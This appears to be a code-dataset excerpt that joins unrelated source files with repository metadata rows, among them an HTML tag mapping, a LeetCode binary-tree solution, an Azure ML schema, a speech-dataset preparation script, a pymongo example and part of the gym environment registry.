tag_to_class['radio'] = Radio
tag_to_class['radio_collection'] = RadioCollection
tag_to_class['radio_set'] = RadioSet
tag_to_class['rect'] = Rect
tag_to_class['rect_collection'] = RectCollection
tag_to_class['rp'] = HTMLElement
tag_to_class['rp_collection'] = HTMLElementCollection
tag_to_class['rt'] = HTMLElement
tag_to_class['rt_collection'] = HTMLElementCollection
tag_to_class['ruby'] = HTMLElement
tag_to_class['ruby_collection'] = HTMLElementCollection
tag_to_class['s'] = HTMLElement
tag_to_class['s_collection'] = HTMLElementCollection
tag_to_class['samp'] = HTMLElement
tag_to_class['samp_collection'] = HTMLElementCollection
tag_to_class['script'] = Script
tag_to_class['script_collection'] = ScriptCollection
tag_to_class['section'] = HTMLElement
tag_to_class['section_collection'] = HTMLElementCollection
tag_to_class['select'] = Select
tag_to_class['select_collection'] = SelectCollection
tag_to_class['select_list'] = Select
tag_to_class['select_list_collection'] = SelectCollection
tag_to_class['small'] = HTMLElement
tag_to_class['small_collection'] = HTMLElementCollection
tag_to_class['source'] = Source
tag_to_class['source_collection'] = SourceCollection
tag_to_class['span'] = Span
tag_to_class['span_collection'] = SpanCollection
tag_to_class['stop'] = Stop
tag_to_class['stop_collection'] = StopCollection
tag_to_class['strong'] = HTMLElement
tag_to_class['strong_collection'] = HTMLElementCollection
tag_to_class['style'] = Style
tag_to_class['style_collection'] = StyleCollection
tag_to_class['sub'] = HTMLElement
tag_to_class['sub_collection'] = HTMLElementCollection
tag_to_class['svg'] = SVG
tag_to_class['svg_collection'] = SVGCollection
tag_to_class['summary'] = HTMLElement
tag_to_class['summary_collection'] = HTMLElementCollection
tag_to_class['sup'] = HTMLElement
tag_to_class['sup_collection'] = HTMLElementCollection
tag_to_class['switch'] = Switch
tag_to_class['switch_collection'] = SwitchCollection
tag_to_class['symbol'] = Symbol
tag_to_class['symbol_collection'] = SymbolCollection
tag_to_class['table'] = Table
tag_to_class['table_collection'] = TableCollection
tag_to_class['tbody'] = TableSection
tag_to_class['tbody_collection'] = TableSectionCollection
tag_to_class['td'] = TableDataCell
tag_to_class['td_collection'] = TableDataCellCollection
tag_to_class['template'] = Template
tag_to_class['template_collection'] = TemplateCollection
tag_to_class['textarea'] = TextArea
tag_to_class['textarea_collection'] = TextAreaCollection
tag_to_class['tfoot'] = TableSection
tag_to_class['tfoot_collection'] = TableSectionCollection
tag_to_class['th'] = TableHeaderCell
tag_to_class['th_collection'] = TableHeaderCellCollection
tag_to_class['thead'] = TableSection
tag_to_class['thead_collection'] = TableSectionCollection
tag_to_class['textPath'] = TextPath
tag_to_class['textPath_collection'] = TextPathCollection
tag_to_class['time'] = Time
tag_to_class['time_collection'] = TimeCollection
tag_to_class['title'] = Title
tag_to_class['title_collection'] = TitleCollection
tag_to_class['tr'] = TableRow
tag_to_class['tr_collection'] = TableRowCollection
tag_to_class['track'] = Track
tag_to_class['track_collection'] = TrackCollection
tag_to_class['tspan'] = TSpan
tag_to_class['tspan_collection'] = TSpanCollection
tag_to_class['u'] = HTMLElement
tag_to_class['u_collection'] = HTMLElementCollection
tag_to_class['ul'] = UList
tag_to_class['ul_collection'] = UListCollection
tag_to_class['use'] = Use
tag_to_class['use_collection'] = UseCollection
tag_to_class['var'] = HTMLElement
tag_to_class['var_collection'] = HTMLElementCollection
tag_to_class['video'] = Video
tag_to_class['video_collection'] = VideoCollection
tag_to_class['view'] = View
tag_to_class['view_collection'] = ViewCollection
tag_to_class['wbr'] = HTMLElement
tag_to_class['wbr_collection'] = HTMLElementCollection
| [
"[email protected]"
]
| |
6700f165faf6659309c518dc3c87dec1653b0d0e | 1047999f13e2f1cbc51c605a5cbeead8cc3ef901 | /db_web/sp/tests.py | 01b4b5e910edcec512d4fc5fd3b3704578151861 | []
| no_license | ichoukou/db_web | ff25243309fc38b31eebf6b9565a7b5e73d24bab | b5a935366c8b6e8cc2539e583e41f0bce2e83c10 | refs/heads/master | 2020-05-20T23:41:38.333132 | 2018-09-11T01:01:59 | 2018-09-11T01:01:59 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 122 | py | from django.test import TestCase
# Create your tests here.
sr='[1,2,3,4]'
str_lst=list(sr)
print(str_lst,type(str_lst)) | [
"[email protected]"
]
| |
626ef1a1961641711c3f61312880cea3994ab7ea | 8d55d3a52ed6dc8111801cea9c7c9d0a84be736b | /src/662.maximum-width-of-binary-tree.py | 236e7d52ce3fdc75ebc2866c5c0b37f29a9c687d | []
| no_license | mic0ud/Leetcode-py3 | 2a23270034ec470571e57c498830b93af813645f | 61fabda324338e907ce3514ae8931c013b8fe401 | refs/heads/master | 2022-12-26T11:52:31.666395 | 2020-09-27T19:27:10 | 2020-09-27T19:27:10 | 297,135,944 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,889 | py | #
# @lc app=leetcode id=662 lang=python3
#
# [662] Maximum Width of Binary Tree
#
# https://leetcode.com/problems/maximum-width-of-binary-tree/description/
#
# algorithms
# Medium (39.55%)
# Likes: 860
# Dislikes: 187
# Total Accepted: 45.6K
# Total Submissions: 115.4K
# Testcase Example: '[1,3,2,5,3,null,9]'
#
# Given a binary tree, write a function to get the maximum width of the given
# tree. The width of a tree is the maximum width among all levels. The binary
# tree has the same structure as a full binary tree, but some nodes are null.
#
# The width of one level is defined as the length between the end-nodes (the
# leftmost and right most non-null nodes in the level, where the null nodes
# between the end-nodes are also counted into the length calculation.
#
# Example 1:
#
#
# Input:
#
# 1
# / \
# 3 2
# / \ \
# 5 3 9
#
# Output: 4
# Explanation: The maximum width existing in the third level with the length 4
# (5,3,null,9).
#
#
# Example 2:
#
#
# Input:
#
# 1
# /
# 3
# / \
# 5 3
#
# Output: 2
# Explanation: The maximum width existing in the third level with the length 2
# (5,3).
#
#
# Example 3:
#
#
# Input:
#
# 1
# / \
# 3 2
# /
# 5
#
# Output: 2
# Explanation: The maximum width existing in the second level with the length 2
# (3,2).
#
#
# Example 4:
#
#
# Input:
#
# 1
# / \
# 3 2
# / \
# 5 9
# / \
# 6 7
# Output: 8
# Explanation: The maximum width existing in the fourth level with the length 8
# (6,null,null,null,null,null,null,7).
#
#
#
#
# Note: Answer will be in the range of a 32-bit signed integer.
#
#
# @lc code=start
# Definition for a binary tree node.
# class TreeNode:
# def __init__(self, x):
# self.val = x
# self.left = None
# self.right = None
from queue import Queue
class Solution:
def widthOfBinaryTree(self, root: TreeNode) -> int:
if not root:
return 0
q = Queue()
q.put([root])
res = 1
while True:
nodes = q.get()
next_ = []
i, start, end = 0, 0, 0
while i < len(nodes) and not nodes[i]:
i += 1
if i == len(nodes):
break
start, i = i, len(nodes)-1
while i > start and not nodes[i]:
i -= 1
end = i
res = max(res, end-start+1)
for k in range(start, end+1):
next_.append(nodes[k].left if nodes[k] else None)
next_.append(nodes[k].right if nodes[k] else None)
q.put(next_)
return res
# @lc code=end
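# ---------------------------------------------------------------------------
# Editor's sketch (not part of the original submission): the accepted solution
# above pads each level with None placeholders, which can use a lot of memory
# on sparse trees. A common alternative labels nodes with heap-style indices
# (root = 1, children 2*i and 2*i + 1) and measures the index gap per level.
# The class name below is made up for illustration only.
# ---------------------------------------------------------------------------
from collections import deque

class SolutionIndexedBFS:
    def widthOfBinaryTree(self, root):
        if not root:
            return 0
        width = 1
        level = deque([(root, 1)])          # (node, positional index)
        while level:
            width = max(width, level[-1][1] - level[0][1] + 1)
            for _ in range(len(level)):     # consume exactly the current level
                node, idx = level.popleft()
                if node.left:
                    level.append((node.left, 2 * idx))
                if node.right:
                    level.append((node.right, 2 * idx + 1))
        return width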
| [
"[email protected]"
]
| |
59a36d90be34893265567174228a0d09d2ef132f | bad62c2b0dfad33197db55b44efeec0bab405634 | /sdk/ml/azure-ai-ml/azure/ai/ml/_schema/compute/usage.py | 39e0151c3a84f06270af1fa3cdc4323d144b0afe | [
"LicenseRef-scancode-python-cwi",
"LGPL-2.1-or-later",
"PSF-2.0",
"LGPL-2.0-or-later",
"GPL-3.0-or-later",
"GPL-1.0-or-later",
"LicenseRef-scancode-warranty-disclaimer",
"LGPL-2.1-only",
"Python-2.0",
"MPL-2.0",
"LicenseRef-scancode-other-copyleft",
"HPND",
"ODbL-1.0",
"GPL-3.0-only",
"ZPL-2.1",
"MIT",
"Apache-2.0",
"BSD-2-Clause",
"BSD-3-Clause",
"LicenseRef-scancode-free-unknown",
"LicenseRef-scancode-generic-cla"
]
| permissive | test-repo-billy/azure-sdk-for-python | 20c5a2486456e02456de17515704cb064ff19833 | cece86a8548cb5f575e5419864d631673be0a244 | refs/heads/master | 2022-10-25T02:28:39.022559 | 2022-10-18T06:05:46 | 2022-10-18T06:05:46 | 182,325,031 | 0 | 0 | MIT | 2019-07-25T22:28:52 | 2019-04-19T20:59:15 | Python | UTF-8 | Python | false | false | 1,289 | py | # ---------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# ---------------------------------------------------------
# pylint: disable=unused-argument,no-self-use
from marshmallow import fields
from marshmallow.decorators import post_load
from azure.ai.ml._restclient.v2021_10_01.models import UsageUnit
from azure.ai.ml._schema.core.fields import NestedField, StringTransformedEnum, UnionField
from azure.ai.ml._schema.core.schema_meta import PatchedSchemaMeta
from azure.ai.ml._utils.utils import camel_to_snake
class UsageNameSchema(metaclass=PatchedSchemaMeta):
value = fields.Str()
localized_value = fields.Str()
@post_load
def make(self, data, **kwargs):
from azure.ai.ml.entities import UsageName
return UsageName(**data)
class UsageSchema(metaclass=PatchedSchemaMeta):
id = fields.Str()
aml_workspace_location = fields.Str()
type = fields.Str()
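    # 'unit' accepts either a free-form string or the service's UsageUnit enum
    # value ("Count"), which the StringTransformedEnum below matches in its
    # snake_case form.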
unit = UnionField(
[
fields.Str(),
StringTransformedEnum(
allowed_values=UsageUnit.COUNT,
casing_transform=camel_to_snake,
),
]
)
current_value = fields.Int()
limit = fields.Int()
name = NestedField(UsageNameSchema)
| [
"[email protected]"
]
| |
bed1f026290d30ab652af5f006794bd8fbc9f765 | c71af56951d1c661a5819db72da1caccd9130df2 | /python/utils/ad_tests_mover.py | 589995b4d3a1d5c721e5c9a0815c477fcb302fc7 | []
| no_license | adrianpoplesanu/personal-work | 2940a0dc4e4e27e0cc467875bae3fdea27dd0d31 | adc289ecb72c1c6f98582f3ea9ad4bf2e8e08d29 | refs/heads/master | 2023-08-23T06:56:49.363519 | 2023-08-21T17:20:51 | 2023-08-21T17:20:51 | 109,451,981 | 0 | 1 | null | 2022-10-07T04:53:24 | 2017-11-03T23:36:21 | Python | UTF-8 | Python | false | false | 457 | py | limit = 95
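# Emits shell 'mv' commands that rename test01.ad ... test95.ad to their
# zero-padded three-digit equivalents (test001.ad ...), followed by an echo.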
def format_2digits(i):
if i < 10:
return "test0" + str(i)
else:
return "test" + str(i)
def format_3digits(i):
if i < 10:
return "test00" + str(i)
elif i < 100:
return "test0" + str(i)
else:
return "test" + str(i)
if __name__ == '__main__':
for i in range(1, limit + 1):
print ("mv " + format_2digits(i) + ".ad " + format_3digits(i) + ".ad ;")
print ("echo 'done'")
| [
"[email protected]"
]
| |
ae269fbeb63c445ff3f0b9c7c9b142899a832f1f | f506dc8837e55dc1d8c023360d3395c1d24833e8 | /prepare-dataset.py | 0b3821e4fe3f99018e9f87a64387bf438986a1dc | [
"MIT"
]
| permissive | hommmm/ParallelTTS | 0f82ed29cdad0441ce491987b72ef17027b48359 | d0e967d6d471bc901c85181a3b734d4df445dd08 | refs/heads/main | 2023-04-24T05:34:10.327568 | 2021-04-15T06:37:29 | 2021-04-15T06:37:29 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,446 | py | #!/usr/bin/env python
"""Download and preprocess datasets. Supported datasets are:
* English female: LJSpeech
* Mandarin female: BBSpeech (BIAOBEI)
* Tibetan female: TBSpeech (Non-public)
* Mongolian male: MBSpeech (Mongolian Bible)
* Korean female: KSSpeech (Kaggle Korean Single Speech)
* Cantonese male: HKSpeech (Common Voice, Hong Kong)
* Japanese female: JPSpeech (JSUT Speech Corpus)
"""
__author__ = 'Atomicoo'
import sys
import os
import os.path as osp
import argparse
import pandas as pd
from utils.hparams import HParam
from utils.utils import download_file
from helpers.processor import Processor
from datasets.dataset import SpeechDataset
parser = argparse.ArgumentParser(description=__doc__, formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser.add_argument('--config', default=None, type=str, help='Config file path')
parser.add_argument('--compute', action='store_true', help='Pre-compute dataset statistics')
args = parser.parse_args()
hparams = HParam(args.config) \
if args.config else HParam(osp.join(osp.abspath(os.getcwd()), 'config', 'default.yaml'))
datasets_path = hparams.data.datasets_path
dataset_file_url = \
f'https://open-speech-data.oss-cn-hangzhou.aliyuncs.com/{hparams.data.dataset_dir}.tar.bz2'
dataset_file_name = osp.basename(dataset_file_url)
dataset_dir = dataset_file_name[:-8]
dataset_path = osp.join(datasets_path, dataset_dir)
wavfile_path = osp.join(dataset_path, "wavs")
melspec_path = osp.join(dataset_path, "mels")
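# Note: the 'and False' in the check below short-circuits the "already exists"
# early exit, so the download/extract branch always runs (an intentional-looking override).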
if osp.isdir(melspec_path) and False:
print("%s dataset folder already exists" % dataset_dir)
sys.exit(0)
else:
dataset_file_path = osp.join(datasets_path, dataset_file_name)
if not osp.isfile(dataset_file_path):
download_file(dataset_file_url, dataset_file_path)
else:
print("'%s' already exists" % dataset_file_name)
if not osp.isdir(wavfile_path):
print("extracting '%s'..." % dataset_file_name)
os.system('cd %s; tar xvjf %s' % (datasets_path, dataset_file_name))
else:
print("'%s' already exists" % wavfile_path)
dataset_root = osp.join(hparams.data.datasets_path, hparams.data.dataset_dir)
dataset = SpeechDataset([], dataset_root, hparams.text)
processor = Processor(hparams=hparams.audio)
# pre process/compute
if args.compute:
processor.precompute(dataset_path, dataset)
else:
processor.preprocess(dataset_path, dataset)
| [
"[email protected]"
]
| |
04dc23f98eeb652b65e913bb594e023fbe573c31 | ce0f8956c4c308c67bd700d31fe8d5a17b16ac08 | /Python3/src/14 Testing/TDD/point.py | 5f5392393d0de4173dee22fb7258d9404262882e | []
| no_license | seddon-software/python3 | 795ae8d22a172eea074b71d6cd49d79e388d8cc6 | d5e6db1509a25c1a3040d5ae82d757539a2ff730 | refs/heads/master | 2021-07-10T15:48:31.893757 | 2020-07-16T20:29:22 | 2020-07-16T20:29:22 | 175,872,757 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 283 | py | class Point:
def __init__(self, x0, y0, name):
self.x = x0
self.y = y0
self.name = name
def moveBy(self, dx, dy):
self.x += dx
self.y += dy
def display(self):
print(f"Point {self.name} is at [{self.x},{self.y}]")
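# Editor's sketch (not in the original file): a minimal usage/test example,
# in the spirit of the TDD folder this module lives in.
if __name__ == '__main__':
    p = Point(1, 2, "A")
    p.moveBy(3, 4)
    assert (p.x, p.y) == (4, 6)
    p.display()  # prints: Point A is at [4,6]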
| [
"[email protected]"
]
| |
0eed8c89461eb6c3b8d3047d689917d934f242ea | edf125be37a40caeb14c7fe32bd9f7511cf0ce9b | /07-cleaning-data-in-python/5-case-study/checking_data_types.py | dbf0982d7a52005d2ab359bdf31bf73197f34252 | []
| no_license | vedpbharti/Datacamp | 1d3d2ca0722a3a19733e91fa054f64e0c3b7114a | b6d019efebe1b46765f19212ba2d8ebb9d90de57 | refs/heads/master | 2020-04-05T05:47:28.528088 | 2019-02-10T22:34:00 | 2019-02-10T22:34:00 | 156,610,704 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,221 | py | '''Checking the data types
Now that your data is in the proper shape, you need to ensure that the columns are of the proper data type. That is, you need to ensure that country is of type object, year is of type int64, and life_expectancy is of type float64.
The tidy DataFrame has been pre-loaded as gapminder. Explore it in the IPython Shell using the .info() method. Notice that the column 'year' is of type object. This is incorrect, so you'll need to use the pd.to_numeric() function to convert it to a numeric data type.
NumPy and pandas have been pre-imported as np and pd.
Instructions
100 XP
Convert the year column of gapminder using pd.to_numeric().
Assert that the country column is of type np.object. This has been done for you.
Assert that the year column is of type np.int64.
Assert that the life_expectancy column is of type np.float64.'''
# Convert the year column to numeric
gapminder.year = pd.to_numeric(gapminder['year'], errors='coerce')
# Test if country is of type object
assert gapminder.country.dtypes == np.object
# Test if year is of type int64
assert gapminder.year.dtypes == np.int64
# Test if life_expectancy is of type float64
assert gapminder.life_expectancy.dtypes == np.float64
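# Added caveat (not part of the original exercise): errors='coerce' converts any
# unparseable year to NaN, which would silently change the dtype to float64 and
# break the int64 assertion above. If that happens, one option is:
# gapminder = gapminder.dropna(subset=['year'])
# gapminder['year'] = gapminder['year'].astype(np.int64)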
| [
"[email protected]"
]
| |
895a00118a48a46da43842ed361ef90b4bf75bc7 | f023692f73992354a0b7823d9c49ae730c95ab52 | /AtCoderRegularContest/109/B.py | e8f63dd4b86156a7a7784479c9988ed5e778177a | []
| no_license | corutopi/AtCorder_python | a959e733f9a3549fab7162023e414ac2c99c4abe | a2c78cc647076071549e354c398155a65d5e331a | refs/heads/master | 2023-08-31T09:40:35.929155 | 2023-08-20T06:19:35 | 2023-08-20T06:19:35 | 197,030,129 | 1 | 0 | null | 2022-06-22T04:06:28 | 2019-07-15T15:57:34 | Python | UTF-8 | Python | false | false | 694 | py | # import sys
# sys.setrecursionlimit(10 ** 6)
# import bisect
# from collections import deque
def binary_search(ok, ng, solve):
    """Binary search: `ok` starts as a value known to satisfy solve(), `ng` as one
    known to fail it; the gap is halved until they are adjacent and `ok` is returned."""
while abs(ok - ng) > 1:
mid = (ok + ng) // 2
if solve(mid):
ok = mid
else:
ng = mid
return ok
# from decorator import stop_watch
#
#
# @stop_watch
def solve(n):
def solve(x):
if (x * (x + 1)) // 2 <= n + 1:
return True
return False
print(n - binary_search(1, n + 1, solve) + 1)
if __name__ == '__main__':
n = int(input())
solve(n)
# # test
# from random import randint
# from func import random_str, random_ints
# solve()
| [
"[email protected]"
]
| |
03c7167733f235f4307297442c65882718598a6e | 7b97d6fef74b35d2f26a9fed79b5b15782f8f9a5 | /examples/basic_example.py | 6ea409ffd7dddf1566fbada82d53d23511f7979b | [
"MIT"
]
| permissive | Edinburgh-Genome-Foundry/tatapov | 22ac8e1fc506267a5d85f6063596485e9fdba9e4 | 06c2aa13e49affc7419e16e853d31c835813fe04 | refs/heads/master | 2023-09-03T22:28:55.443170 | 2022-05-06T13:41:32 | 2022-05-06T13:41:32 | 150,324,605 | 12 | 2 | NOASSERTION | 2020-09-08T23:31:43 | 2018-09-25T20:22:46 | Python | UTF-8 | Python | false | false | 242 | py | import tatapov
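# Minimal example: load the 25C / 1h overhang annealing dataset, keep a few
# overhangs (plus their reverse complements), then plot the heatmap and save it.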
data = tatapov.annealing_data["25C"]["01h"]
subset = tatapov.data_subset(data, ["ACGA", "AAAT", "AGAG"], add_reverse=True)
ax, _ = tatapov.plot_data(subset, figwidth=5)
ax.figure.tight_layout()
ax.figure.savefig("example.png") | [
"[email protected]"
]
| |
7ae787bca6218c85ab763ed18d5cc546dd7a9f72 | 866418a05db550487e5eb6f5063f04f1241ccb4a | /example/11/╡┌11.3_1.py | 39c0355ca01e72cc70a9202afd65d0b91cafe609 | []
| no_license | Freshield/LEARN_Python_Crawler | 37cd552de8fb3f30157326a22a6b5cd62bd74703 | 53406cac38c27960e863c7bd5366bd1ae01ecd6c | refs/heads/main | 2023-02-19T00:36:52.548150 | 2021-01-23T03:40:20 | 2021-01-23T03:40:20 | 326,993,103 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 469 | py | import pymongo
# Create a client object and connect to the local database.
# Method 1:
client = pymongo.MongoClient()
# Method 2:
client = pymongo.MongoClient('localhost', 27017)
# Method 3:
client = pymongo.MongoClient('mongodb://localhost:27017/')
# Connect to the 'DB' database
db = client['DB']
# Connect to the 'user' collection; a collection is similar to a table in a relational database
# If the collection does not exist, a new 'user' collection will be created
user_collection = db.user
# Define the document structure (a document is what we usually call the data)
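# (Editor's sketch -- the original file appears to stop here.) A document is a
# plain dict; it could be stored with insert_one(), e.g.:
# user = {'name': 'xiaoming', 'age': 20}
# user_collection.insert_one(user)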
| [
"[email protected]"
]
| |
4e20e0113f12ca54ff93d7de62bcc9e2d82234cf | bca56a70984c620d0e86be6c03a1e18ce3af2c2c | /gym/envs/__init__.py | 44b07343068c4b239f537eb49b6fd7f81f1eb732 | [
"MIT"
]
| permissive | davidsonic/self_brewed_gym | 9f44f1fc22a7dcf3cfb4a6850cb10dee8c2c2e17 | 4e0cffb3a6aad1f570aa748c22bf6a289aaa1ab3 | refs/heads/master | 2020-04-15T13:23:34.797762 | 2019-01-12T22:46:53 | 2019-01-12T22:46:53 | 164,715,071 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 14,852 | py | from gym.envs.registration import registry, register, make, spec
# Algorithmic
# ----------------------------------------
register(
id='Copy-v0',
entry_point='gym.envs.algorithmic:CopyEnv',
max_episode_steps=200,
reward_threshold=25.0,
)
register(
id='RepeatCopy-v0',
entry_point='gym.envs.algorithmic:RepeatCopyEnv',
max_episode_steps=200,
reward_threshold=75.0,
)
register(
id='ReversedAddition-v0',
entry_point='gym.envs.algorithmic:ReversedAdditionEnv',
kwargs={'rows' : 2},
max_episode_steps=200,
reward_threshold=25.0,
)
register(
id='ReversedAddition3-v0',
entry_point='gym.envs.algorithmic:ReversedAdditionEnv',
kwargs={'rows' : 3},
max_episode_steps=200,
reward_threshold=25.0,
)
register(
id='DuplicatedInput-v0',
entry_point='gym.envs.algorithmic:DuplicatedInputEnv',
max_episode_steps=200,
reward_threshold=9.0,
)
register(
id='Reverse-v0',
entry_point='gym.envs.algorithmic:ReverseEnv',
max_episode_steps=200,
reward_threshold=25.0,
)
# Classic
# ----------------------------------------
register(
id='CartPole-v0',
entry_point='gym.envs.classic_control:CartPoleEnv',
max_episode_steps=200,
reward_threshold=195.0,
)
register(
id='CartPole-v1',
entry_point='gym.envs.classic_control:CartPoleEnv',
max_episode_steps=500,
reward_threshold=475.0,
)
register(
id='MountainCar-v0',
entry_point='gym.envs.classic_control:MountainCarEnv',
max_episode_steps=200,
reward_threshold=-110.0,
)
register(
id='MountainCarContinuous-v0',
entry_point='gym.envs.classic_control:Continuous_MountainCarEnv',
max_episode_steps=999,
reward_threshold=90.0,
)
register(
id='Pendulum-v0',
entry_point='gym.envs.classic_control:PendulumEnv',
max_episode_steps=200,
)
register(
id='Acrobot-v1',
entry_point='gym.envs.classic_control:AcrobotEnv',
max_episode_steps=500,
)
# Box2d
# ----------------------------------------
register(
id='LunarLander-v2',
entry_point='gym.envs.box2d:LunarLander',
max_episode_steps=1000,
reward_threshold=200,
)
register(
id='LunarLanderContinuous-v2',
entry_point='gym.envs.box2d:LunarLanderContinuous',
max_episode_steps=1000,
reward_threshold=200,
)
register(
id='BipedalWalker-v2',
entry_point='gym.envs.box2d:BipedalWalker',
max_episode_steps=1600,
reward_threshold=300,
)
register(
id='BipedalWalkerHardcore-v2',
entry_point='gym.envs.box2d:BipedalWalkerHardcore',
max_episode_steps=2000,
reward_threshold=300,
)
register(
id='CarRacing-v0',
entry_point='gym.envs.box2d:CarRacing',
max_episode_steps=1000,
reward_threshold=900,
)
# Toy Text
# ----------------------------------------
register(
id='Blackjack-v0',
entry_point='gym.envs.toy_text:BlackjackEnv',
)
register(
id='KellyCoinflip-v0',
entry_point='gym.envs.toy_text:KellyCoinflipEnv',
reward_threshold=246.61,
)
register(
id='KellyCoinflipGeneralized-v0',
entry_point='gym.envs.toy_text:KellyCoinflipGeneralizedEnv',
)
register(
id='FrozenLake-v0',
entry_point='gym.envs.toy_text:FrozenLakeEnv',
kwargs={'map_name' : '4x4'},
max_episode_steps=100,
reward_threshold=0.78, # optimum = .8196
)
register(
id='FrozenLake8x8-v0',
entry_point='gym.envs.toy_text:FrozenLakeEnv',
kwargs={'map_name' : '8x8'},
max_episode_steps=200,
reward_threshold=0.99, # optimum = 1
)
register(
id='CliffWalking-v0',
entry_point='gym.envs.toy_text:CliffWalkingEnv',
)
register(
id='NChain-v0',
entry_point='gym.envs.toy_text:NChainEnv',
max_episode_steps=1000,
)
register(
id='Roulette-v0',
entry_point='gym.envs.toy_text:RouletteEnv',
max_episode_steps=100,
)
register(
id='Taxi-v2',
entry_point='gym.envs.toy_text.taxi:TaxiEnv',
reward_threshold=8, # optimum = 8.46
max_episode_steps=200,
)
register(
id='GuessingGame-v0',
entry_point='gym.envs.toy_text.guessing_game:GuessingGame',
max_episode_steps=200,
)
register(
id='HotterColder-v0',
entry_point='gym.envs.toy_text.hotter_colder:HotterColder',
max_episode_steps=200,
)
# Mujoco
# ----------------------------------------
# 2D
register(
id='Reacher-v2',
entry_point='gym.envs.mujoco:ReacherEnv',
max_episode_steps=50,
reward_threshold=-3.75,
)
register(
id='Pusher-v2',
entry_point='gym.envs.mujoco:PusherEnv',
max_episode_steps=100,
reward_threshold=0.0,
)
register(
id='Thrower-v2',
entry_point='gym.envs.mujoco:ThrowerEnv',
max_episode_steps=100,
reward_threshold=0.0,
)
register(
id='Striker-v2',
entry_point='gym.envs.mujoco:StrikerEnv',
max_episode_steps=100,
reward_threshold=0.0,
)
register(
id='InvertedPendulum-v2',
entry_point='gym.envs.mujoco:InvertedPendulumEnv',
max_episode_steps=1000,
reward_threshold=950.0,
)
# debug
register(
id='MyInvertedPendulum-v2',
entry_point='gym.envs.mujoco:MyInvertedPendulumEnv',
max_episode_steps=1000,
reward_threshold=950.0,
)
register(
id='InvertedDoublePendulum-v2',
entry_point='gym.envs.mujoco:InvertedDoublePendulumEnv',
max_episode_steps=1000,
reward_threshold=9100.0,
)
register(
id='HalfCheetah-v2',
entry_point='gym.envs.mujoco:HalfCheetahEnv',
max_episode_steps=1000,
reward_threshold=4800.0,
)
register(
id='Hopper-v2',
entry_point='gym.envs.mujoco:HopperEnv',
max_episode_steps=1000,
reward_threshold=3800.0,
)
register(
id='Swimmer-v2',
entry_point='gym.envs.mujoco:SwimmerEnv',
max_episode_steps=1000,
reward_threshold=360.0,
)
register(
id='Walker2d-v2',
max_episode_steps=1000,
entry_point='gym.envs.mujoco:Walker2dEnv',
)
register(
id='Ant-v2',
entry_point='gym.envs.mujoco:AntEnv',
max_episode_steps=1000,
reward_threshold=6000.0,
)
register(
id='Humanoid-v2',
entry_point='gym.envs.mujoco:HumanoidEnv',
max_episode_steps=1000,
)
register(
id='HumanoidStandup-v2',
entry_point='gym.envs.mujoco:HumanoidStandupEnv',
max_episode_steps=1000,
)
# debug
register(
id='HumanoidStandup-v1',
entry_point='gym.envs.mujoco:HumanoidStandEnv',
max_episode_steps=1000,
)
# Robotics
# ----------------------------------------
def _merge(a, b):
a.update(b)
return a
for reward_type in ['sparse', 'dense']:
suffix = 'Dense' if reward_type == 'dense' else ''
kwargs = {
'reward_type': reward_type,
}
# Fetch
register(
id='FetchSlide{}-v1'.format(suffix),
entry_point='gym.envs.robotics:FetchSlideEnv',
kwargs=kwargs,
max_episode_steps=50,
)
register(
id='FetchPickAndPlace{}-v1'.format(suffix),
entry_point='gym.envs.robotics:FetchPickAndPlaceEnv',
kwargs=kwargs,
max_episode_steps=50,
)
# debug
register(
id='FetchAdv{}-v1'.format(suffix),
entry_point='gym.envs.robotics:FetchAdvEnv',
kwargs=kwargs,
max_episode_steps=50,
)
register(
id='FetchReach{}-v1'.format(suffix),
entry_point='gym.envs.robotics:FetchReachEnv',
kwargs=kwargs,
max_episode_steps=50,
)
register(
id='FetchPush{}-v1'.format(suffix),
entry_point='gym.envs.robotics:FetchPushEnv',
kwargs=kwargs,
max_episode_steps=50,
)
# Hand
register(
id='HandReach{}-v0'.format(suffix),
entry_point='gym.envs.robotics:HandReachEnv',
kwargs=kwargs,
max_episode_steps=50,
)
register(
id='HandManipulateBlockRotateZ{}-v0'.format(suffix),
entry_point='gym.envs.robotics:HandBlockEnv',
kwargs=_merge({'target_position': 'ignore', 'target_rotation': 'z'}, kwargs),
max_episode_steps=100,
)
register(
id='HandManipulateBlockRotateParallel{}-v0'.format(suffix),
entry_point='gym.envs.robotics:HandBlockEnv',
kwargs=_merge({'target_position': 'ignore', 'target_rotation': 'parallel'}, kwargs),
max_episode_steps=100,
)
register(
id='HandManipulateBlockRotateXYZ{}-v0'.format(suffix),
entry_point='gym.envs.robotics:HandBlockEnv',
kwargs=_merge({'target_position': 'ignore', 'target_rotation': 'xyz'}, kwargs),
max_episode_steps=100,
)
register(
id='HandManipulateBlockFull{}-v0'.format(suffix),
entry_point='gym.envs.robotics:HandBlockEnv',
kwargs=_merge({'target_position': 'random', 'target_rotation': 'xyz'}, kwargs),
max_episode_steps=100,
)
# Alias for "Full"
register(
id='HandManipulateBlock{}-v0'.format(suffix),
entry_point='gym.envs.robotics:HandBlockEnv',
kwargs=_merge({'target_position': 'random', 'target_rotation': 'xyz'}, kwargs),
max_episode_steps=100,
)
register(
id='HandManipulateEggRotate{}-v0'.format(suffix),
entry_point='gym.envs.robotics:HandEggEnv',
kwargs=_merge({'target_position': 'ignore', 'target_rotation': 'xyz'}, kwargs),
max_episode_steps=100,
)
register(
id='HandManipulateEggFull{}-v0'.format(suffix),
entry_point='gym.envs.robotics:HandEggEnv',
kwargs=_merge({'target_position': 'random', 'target_rotation': 'xyz'}, kwargs),
max_episode_steps=100,
)
# Alias for "Full"
register(
id='HandManipulateEgg{}-v0'.format(suffix),
entry_point='gym.envs.robotics:HandEggEnv',
kwargs=_merge({'target_position': 'random', 'target_rotation': 'xyz'}, kwargs),
max_episode_steps=100,
)
register(
id='HandManipulatePenRotate{}-v0'.format(suffix),
entry_point='gym.envs.robotics:HandPenEnv',
kwargs=_merge({'target_position': 'ignore', 'target_rotation': 'xyz'}, kwargs),
max_episode_steps=100,
)
register(
id='HandManipulatePenFull{}-v0'.format(suffix),
entry_point='gym.envs.robotics:HandPenEnv',
